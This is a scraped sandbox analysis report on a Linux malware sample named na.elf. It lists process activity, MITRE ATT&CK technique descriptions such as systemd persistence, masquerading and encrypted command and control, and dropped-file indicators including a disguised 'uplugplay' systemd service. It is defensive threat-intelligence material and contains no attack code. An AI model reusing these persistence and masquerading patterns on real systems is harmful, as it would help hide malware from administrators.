File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6429, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6429, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6431, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6431, Parent PID: 1

General

Start time (UTC):	08:53:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/CommId

/memfd:snapd-env-generator (deleted)

/usr/lib/systemd/system/uplugplay.service

/usr/sbin/uplugplay

/var/lib/fwupd/gnupg/.#lk0x000055e78355eb80.galassia.6427

/var/lib/fwupd/gnupg/.#lk0x000055e85c3a9b80.galassia.6425

/var/lib/fwupd/gnupg/.#lk0x000055f30dfd7b80.galassia.6431

/var/lib/fwupd/gnupg/.#lk0x0000561fc14f8b80.galassia.6429

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: na.elf PID: 6217, Parent PID: 6130

General

File Activities

Linux Analysis Report
na.elf